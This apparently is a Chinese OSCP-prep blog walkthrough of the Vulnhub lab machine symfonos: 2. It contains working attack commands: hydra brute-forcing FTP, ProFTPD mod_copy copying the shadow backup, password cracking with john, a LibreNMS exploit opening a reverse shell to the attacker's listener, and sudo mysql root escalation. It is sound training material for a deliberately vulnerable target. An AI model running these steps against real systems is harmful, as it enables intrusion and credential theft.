OSCP备考_0x19_Vulnhub靶机_symfonos: 2

Ethan医生2周前靶场33
名称说明
靶机下载链接https://www.vulnhub.com/entry/symfonos-2,331/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.186

arp-scan 192.168.233.1/24 

image.png


nmap -p- 192.168.233.186

image.png


nmap -p21,22,80,139,445 -A -sV -T5 192.168.233.186


image.png


看到139和445

nmap -p139,445 -A -T5 --script=smb-enum-shares 192.168.233.186 

image.png

smbclient \\192.168.233.186\anonymous


  image.png

image.png

里面有放置Log的地址


查看80端口路径

gobuster dir -u http://192.168.233.186/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt

没找到有价值的目录

image.png

smbclient -L //192.168.233.186   

image.png


从上述log.txt文件中得到两个信息,一个是有shadow.txt文件备份在了共享文件夹,然后目标靶机的共享文件夹的绝对路径是/home/aeolus/share/ 那么根据这两个现象一个思路就是再拷贝/etc/passwd文件到共享文件夹中然后将其下来下来使用unshadow处理一下通过john进行破解目标靶机的ssh密码, 这里拷贝的方式是根据上面nmap扫描出来的ftp服务漏洞进行利用操作,具体如下:

知道用户名之后, 尝试使用hydra 进行密码爆破

hydra -l aeolus -P /usr/share/wordlists/rockyou.txt ftp://192.168.233.186

image.png



爆破,或另外一种思路是由FTP内CP /etc/passwd挡案到分享目录内 然后再将分享目录导出进行破解爆破


site cpfr /var/backups/shadow.bak

site cpto /home/aeolus/share/shadow.txt


image.png

image.png

将passwd和shadow一起放到匿名下 

smbclient //192.168.233.186/anonymous,然后就可以使用unshadow


unshadow 是 Kali Linux 和其他渗透测试工具集(如 John the Ripper 套件)中的一个实用工具,主要用于 合并 /etc/passwd 和 /etc/shadow 文件,以便进行密码破解。

image.png

image.png

unshadow passwd.txt shadow.txt > johnhash.txt

获取到hash值直接使用john进行爆破就行

image.png

aeolus:sergioteamo
用来登录ssh试试,登入上了 但是没有找到可用漏洞

这边看下他网络使用情况 发现没有访问权限 所以需要做端口转发


 ssh -Nf -L 9933:127.0.0.1:8080 aeolus@192.168.233.186

image.png




找寻漏洞使用

image.png

python2.7 47044.py http://127.0.0.1:9933 "XSRF-TOKEN=eyJpdiI6InFQV05JcGxLYVdPODhDaDJvdzIyUHc9PSIsInZhbHVlIjoiZU9jSkxWVFVEblNWaUNVMnZScXpTWmlCdWhNcnNkNkdGMVc3NGwxNjZkV0Y0bEVGRmU5c0lQSjF0eEdGbDdFYjJzaTFYb3ZtUzQ3VDVMNHV3VGYzOVE9PSIsIm1hYyI6ImIzMjY2N2ExMzgwZDEwZGQ5ZjY2ZjEzMGY3ZTMwOGRmZDczOThkNmJiOGI2MmU3NjhmMjM4MzMyYmFiODIxZGYifQ%3D%3D; librenms_session=eyJpdiI6ImJQMER0N0Rpd2pNWlZGWThqWlB6anc9PSIsInZhbHVlIjoibTdzQ2thYTFGOVd2ZWx2NHVoY3NRQ0lvTFR6WDBFbURrZ2VsWUd5VmpLNlExTnVJY3ZYYmk4d1c1TzdKemN2S3FySEpxb0laSUxZQWxWWlJrdUpKWXc9PSIsIm1hYyI6ImM4ZmRlMTIyYTk5YTkxMzMyNWE2ZTAwNGRkMjZkM2FhNzBmMjVlM2E3ZmU2N2ExNTVmYjFlYmNhYjVmZDBjMzEifQ%3D%3D; PHPSESSID=dqfs9scn7vfm0u1fvte0b52os2" 192.168.233.168 4444

image.png

监听nc -lvnp 4444

image.png

image.png

可以直接用MYSQL提权 

sudo mysql -e '\! /bin/sh'

image.png

image.png






标签: OSCP

相关文章

OSCP备考_0x12_Vulnhub靶机_Lampião: 1

OSCP备考_0x12_Vulnhub靶机_Lampião: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/lampiao-1,249/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x13_Vulnhub靶机_Raven: 1

OSCP备考_0x13_Vulnhub靶机_Raven: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-1,256/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x04_HackThBox靶机_Linux_cronos

OSCP备考_0x04_HackThBox靶机_Linux_cronos

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)nmap -sU --top-ports 100 10.129.184.136...

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

名称说明靶机下载链接https://www.vulnhub.com/entry/pwnlab-init,158/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

名称说明靶机下载链接https://www.vulnhub.com/entry/sickos-11,132/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-52,415/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。